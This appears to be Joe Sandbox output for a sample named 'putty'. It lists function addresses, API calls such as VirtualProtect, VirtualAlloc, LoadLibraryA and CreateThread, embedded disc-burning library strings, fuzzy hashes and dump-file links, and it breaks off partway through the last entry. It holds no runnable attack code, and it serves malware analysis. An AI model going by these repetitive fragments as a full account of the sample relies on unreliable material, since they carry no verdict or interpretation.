Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction ID: a17970a04511c8e929ec54b82dd2bafae5423732917924efa45e128838ed53df
Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction Fuzzy Hash: 1D410E75A00108AFDB18DF98C494BADB7F6EF88300F148168E619DBB94DB34EE45CB54

Function 00327410 Relevance: 3.7, APIs: 2, Instructions: 683
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNEL32(?,000524B9), ref: 0032783B
HeapAlloc.KERNEL32(00000000,-419B8859,-007D3347,?,000524B9), ref: 00327ADE

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Heap$AllocCreate
String ID:
API String ID: 2618940340-0
Opcode ID: 50f5e7370151f477344b68fa88299a59fa56451a0c635660168c8a9f2627f312
Instruction ID: adfe3b1716d9496806a31a9061baab28e75308e4a25dce5e76f1916cd56256a3
Opcode Fuzzy Hash: 50f5e7370151f477344b68fa88299a59fa56451a0c635660168c8a9f2627f312
Instruction Fuzzy Hash: DC3202329103218FC709EF75FE865AA37A2FB80304346D23ED912DB575DBB455628B8D

Function 00327480 Relevance: 3.7, APIs: 2, Instructions: 663
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNEL32(?,000524B9), ref: 0032783B
HeapAlloc.KERNEL32(00000000,-419B8859,-007D3347,?,000524B9), ref: 00327ADE

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Heap$AllocCreate
String ID:
API String ID: 2618940340-0
Opcode ID: 169a5f254c4c98eb4f8fc84b005cdfedd4b05b73de13bf3b26bdcb528332d9c0
Instruction ID: c80bf78103dade898d05f6233620835f45eab4f23e18ba6a9c2953464c4f8b44
Opcode Fuzzy Hash: 169a5f254c4c98eb4f8fc84b005cdfedd4b05b73de13bf3b26bdcb528332d9c0
Instruction Fuzzy Hash: CE3204329103218FC709EF75FE865AA37A2FB80305346D23ED952DB476DBB454628B8D

Function 0287110B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 028711D7

Strings

,, xrefs: 02871223

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: ,
API String ID: 2422867632-3772416878
Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction ID: 5c5b2cc9a0f419485dafcbdec05459b0253bd4725f663f5e8e702af210a165dc
Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
Instruction Fuzzy Hash: D341B778A00209EFDB04CF98C994BAEB7B1FF48314F208198D515AB791C771AE81CF94

Function 00327710 Relevance: 3.5, APIs: 2, Instructions: 501
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNEL32(?,000524B9), ref: 0032783B
HeapAlloc.KERNEL32(00000000,-419B8859,-007D3347,?,000524B9), ref: 00327ADE

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Heap$AllocCreate
String ID:
API String ID: 2618940340-0
Opcode ID: 5994449f0373195aa9f3af3fcbdfcf109cc8b7815840adadc13434ca5e4e7299
Instruction ID: d1799c9fbd58eacb0e0e1f26d62f13a4d9572be5e448e5ec405c08f2e1a33ca8
Opcode Fuzzy Hash: 5994449f0373195aa9f3af3fcbdfcf109cc8b7815840adadc13434ca5e4e7299
Instruction Fuzzy Hash: 670205329043218FC74AEF75FE865AA37A2FB80300346D63DD506DB4B5CFB454628A8D

Function 00327350 Relevance: 1.9, APIs: 1, Instructions: 438
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNEL32(?,000524B9), ref: 0032783B

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: da24cd7c428cb5fbccf4ba2c6db0bb486870ddf58af4ef34913d595d6c5e06b8
Instruction ID: 2b1efb967e3cdaf5a56fb3a0e89366b8f680de21ed864278ea40bd1da82b3834
Opcode Fuzzy Hash: da24cd7c428cb5fbccf4ba2c6db0bb486870ddf58af4ef34913d595d6c5e06b8
Instruction Fuzzy Hash: ADE124329103258FC70AEF75FE865AA37A2FB84314341D23DD852CB5B9DBB455228B8D

Function 02870B4B Relevance: 1.9, APIs: 1, Instructions: 399
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 02870DEE

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 9f7fcd7d1370a4ee11295bc48d71b7659720b1406f26e3b81b296f5d199506f0
Instruction ID: 3fb9af3243b90fcc5147910f86e86b5cc2ab238dc038b525098b9d8ebc4cd33e
Opcode Fuzzy Hash: 9f7fcd7d1370a4ee11295bc48d71b7659720b1406f26e3b81b296f5d199506f0
Instruction Fuzzy Hash: 3D12D5B9E00219DFDB14CF98C994BADBBB1FF48304F2481A9D519AB385C735AA41CF54

Function 003274E0 Relevance: 1.8, APIs: 1, Instructions: 344
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNEL32(?,000524B9), ref: 0032783B

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: f19057d1b53d43acf219c7b53bd8c22897564d6c43a680a976775c0acd95125e
Instruction ID: ad8e193776b18d852506401d00cf88095eef84af0855bd0cba38779dc326bd55
Opcode Fuzzy Hash: f19057d1b53d43acf219c7b53bd8c22897564d6c43a680a976775c0acd95125e
Instruction Fuzzy Hash: 69C10032A103258FC709EF75FE965EA37A2FB84310341D23ED952CB4B5DBB455228A8D

Function 00325D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003B964E: _malloc.LIBCMT ref: 003B9668

CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 00325E29
CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 00325E35
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00325E43
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00325E51
std::exception::exception.LIBCMT ref: 00325EAA
__CxxThrowException@8.LIBCMT ref: 00325EBF

Strings

\-@, xrefs: 00325EB4, 00325EB7

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Create$EventMutex$Exception@8Throw_mallocstd::exception::exception
String ID: \-@
API String ID: 2496263583-3423671737
Opcode ID: cca72c8a973475443770f0d0e1df6548ddaf4a71705ead2ce212326974627405
Instruction ID: fe0763a2db5f095e3b1265127ae75c684e6db59be86a3f9a69f70d0bba034ffd
Opcode Fuzzy Hash: cca72c8a973475443770f0d0e1df6548ddaf4a71705ead2ce212326974627405
Instruction Fuzzy Hash: 70418BB1811669ABC711DF69D944B8ABFFCFF09714F14815BF5089BA41D3B0AA00CBE0

Function 003B964E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 003B9668

Part of subcall function 003B9B62: __FF_MSGBANNER.LIBCMT ref: 003B9B7B
Part of subcall function 003B9B62: __NMSG_WRITE.LIBCMT ref: 003B9B82
Part of subcall function 003B9B62: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,003BE372,00000000,00000001,00000000,?,003CA150,00000018,00402B88,0000000C,003CA1E0), ref: 003B9BA7

std::exception::exception.LIBCMT ref: 003B969D
__CxxThrowException@8.LIBCMT ref: 003B96C8

Strings

@!2, xrefs: 003B9665

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::exception::exception
String ID: @!2
API String ID: 1264268182-3415412913
Opcode ID: 611b9476353143b2dd6042f8f6511721893fa78bd012204a85e53514195a98f6
Instruction ID: 4ece0247c55c6a72fc8f0a3e53b795f4229f01f1dc6505cc8f7334bc847b4e0e
Opcode Fuzzy Hash: 611b9476353143b2dd6042f8f6511721893fa78bd012204a85e53514195a98f6
Instruction Fuzzy Hash: 0EF0D63590020AA6CF02EF54DC4ABDD3BA9AB00728F10406BF704AA9E1DFB09D41C344

Function 028C00AD Relevance: 6.1, APIs: 4, Instructions: 99
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 028C22CB: LoadLibraryA.KERNEL32(00000000,?,?), ref: 028C235D

VirtualProtect.KERNEL32(00000000,0000000C,00000040,?), ref: 028C0108
VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 028C013B
VirtualProtect.KERNEL32(00000000,0040145E,00000040,?), ref: 028C016E
VirtualProtect.KERNEL32(00000000,0040145E,?,?), ref: 028C0198

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 544c524c5f03252b96133d4295c441da5d44db607709df4b952f0ae727dfced4
Instruction ID: 8caeb4a11968831911e4ef718ba9cb67a0a8727e6fad9577d2db15b5fe0e52ca
Opcode Fuzzy Hash: 544c524c5f03252b96133d4295c441da5d44db607709df4b952f0ae727dfced4
Instruction Fuzzy Hash: E521C47E208209BFF310AAA58C44FBBB69CDB84344F54083FFE46D2191EB75E9058676

Function 028C0F1D Relevance: 4.8, APIs: 3, Instructions: 325
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 028C0F97
VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 028C12DB
RtlExitUserProcess.NTDLL(00000000), ref: 028C12E4

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID: Virtual$AllocExitFreeProcessUser
String ID:
API String ID: 1828502597-0
Opcode ID: 3017fd99d0584aa20b0153e116f0a50b272e6a421316d4372083565c5f77b8b3
Instruction ID: 55ffaae553d101d721401cd5891bc82a7816498f1ef623c1caa6a68828117248
Opcode Fuzzy Hash: 3017fd99d0584aa20b0153e116f0a50b272e6a421316d4372083565c5f77b8b3
Instruction Fuzzy Hash: 04B1D13D500606EBDB21DA64CCC8BA7B7E9BF05314F20052DE99DD2592D731E550CFA2

Function 028C22CB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00000000,?,?), ref: 028C235D

Strings

.dll, xrefs: 028C2302

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .dll
API String ID: 1029625771-2738580789
Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
Instruction ID: 61229b9e00c0060f06b987946bc7be10fce856c88f236476a17de7def6ef05b6
Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
Instruction Fuzzy Hash: AA21E77D6002958FD711DFBCC844B6EBBA8BF05224F28416DDC19C7699D730E8458750

Function 028C01A8 Relevance: 3.0, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 028C22CB: LoadLibraryA.KERNEL32(00000000,?,?), ref: 028C235D

VirtualProtect.KERNEL32(00000000,00000004,00000040,?), ref: 028C01E0
VirtualProtect.KERNEL32(00000000,00000004,?,?), ref: 028C0203

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 355f7a5a870867b02340d2dab44903ecb3bac44aab23468b058fab7a7d97728b
Instruction ID: f6f098ccdfd21cbc0231d737287021e32970bed422fba9f67407f88802f4ae06
Opcode Fuzzy Hash: 355f7a5a870867b02340d2dab44903ecb3bac44aab23468b058fab7a7d97728b
Instruction Fuzzy Hash: 7AF081BA200604BAE622AA64DC41FFB72ACEB49A54F10041CFF16D6084E771E6058AB5

Non-executed Functions

Function 00343840 Relevance: 24.7, APIs: 4, Strings: 10, Instructions: 176COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003438CC
_memmove.LIBCMT ref: 0034390F
DeviceIoControl.KERNEL32(?,0004D014,?,00000050,?,00000050,?,00000000), ref: 00343960
GetLastError.KERNEL32(?,?,?,?,?), ref: 00343982

Strings

0, xrefs: 003438FF
[sptidriver]: scsi command failed (0x%.2x)., xrefs: 003439B6
[sptidriver]: unable to obtain device handle (%d, %d, %d, %s)., xrefs: 00343893
[sptidriver]: > ascq: 0x%.2x, xrefs: 00343A35
[sptidriver]: > asc: 0x%.2x, xrefs: 00343A24
[sptidriver]: > sense key: 0x%x, xrefs: 00343A13
0x%.2x, xrefs: 003439DD
[sptidriver]: > cdb: , xrefs: 003439C1
,0x%.2x, xrefs: 003439E9
[sptidriver]: DeviceIoControl failed (%d; 0x%p, %d, 0x%p, %d, %d)., xrefs: 00343989

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: ControlDeviceErrorLast_memmove_memset
String ID: ,0x%.2x$0$0x%.2x$[sptidriver]: > asc: 0x%.2x$[sptidriver]: > ascq: 0x%.2x$[sptidriver]: > cdb: $[sptidriver]: > sense key: 0x%x$[sptidriver]: DeviceIoControl failed (%d; 0x%p, %d, 0x%p, %d, %d).$[sptidriver]: scsi command failed (0x%.2x).$[sptidriver]: unable to obtain device handle (%d, %d, %d, %s).
API String ID: 1353868144-310529132
Opcode ID: 7931d02bd3220f38771b6e6f3114465f2fd2d4fc648648f3ec0e6d2331e59e69
Instruction ID: 62db5590d0e30614f57cefc56daafac0a2072ec73f9d40e6bdc2aa173aff290c
Opcode Fuzzy Hash: 7931d02bd3220f38771b6e6f3114465f2fd2d4fc648648f3ec0e6d2331e59e69
Instruction Fuzzy Hash: 0151E4B1508340AFE711DF689C85A7BBBE8EF88705F04451AF9958B281C771EA14CBA2

Function 0032EA60 Relevance: 21.5, APIs: 2, Strings: 10, Instructions: 480COMMON

Download Yara Rule

Strings

;, xrefs: 0032ECB8
Error: Unable to read system directory record length (size mismatch)., xrefs: 0032EB66
Error: Unable to read directory record file identifier (size mismatch)., xrefs: 0032F055
Error: Unable to read system directory record length., xrefs: 0032EB4A
Error: Unable to read directory record (size mismatch: %u vs. %u)., xrefs: 0032EFF8
Error: Unable to read directory record file identifier., xrefs: 0032F036
Error: Unable to read through zeroes (size mismatch)., xrefs: 0032F093
Error: Unable to read through zeroes., xrefs: 0032F074
Error: Unable to read directory record., xrefs: 0032EFD6
Error: Directory record file identifier is too large: %u bytes., xrefs: 0032F014

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID:
String ID: ;$Error: Directory record file identifier is too large: %u bytes.$Error: Unable to read directory record (size mismatch: %u vs. %u).$Error: Unable to read directory record file identifier (size mismatch).$Error: Unable to read directory record file identifier.$Error: Unable to read directory record.$Error: Unable to read system directory record length (size mismatch).$Error: Unable to read system directory record length.$Error: Unable to read through zeroes (size mismatch).$Error: Unable to read through zeroes.
API String ID: 0-1483554182
Opcode ID: e26bd2a51639edf271c253167af11d982f00bd209b0ca5d0f4f424182c18847e
Instruction ID: 5b2de763b349ec6b215b125c524eb4cc188786f4870eeeb280445f0f23b93ef6
Opcode Fuzzy Hash: e26bd2a51639edf271c253167af11d982f00bd209b0ca5d0f4f424182c18847e
Instruction Fuzzy Hash: 0D129230A042659FCB25CF28DC91BEDB7B6AF89300F1585E9E95997381D734AE81CF90

Function 00331931 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 435timeCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00331980
__CxxThrowException@8.LIBCMT ref: 00331A80
GetTimeZoneInformation.KERNEL32(?), ref: 00331AD2
GetTimeZoneInformation.KERNEL32(?), ref: 00331B4A
GetTimeZoneInformation.KERNEL32(?), ref: 00331BBF
__aulldiv.LIBCMT ref: 00331C62
_memset.LIBCMT ref: 00331D21
_memset.LIBCMT ref: 00331DAB

Strings

4, xrefs: 00331D74
DVD-Video discs does not allow files larger than 1 GiB., xrefs: 00331A6A
*UDF FreeEASpace*UDF DVD CGMS Info, xrefs: 00331D26
8, xrefs: 00331DC2

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
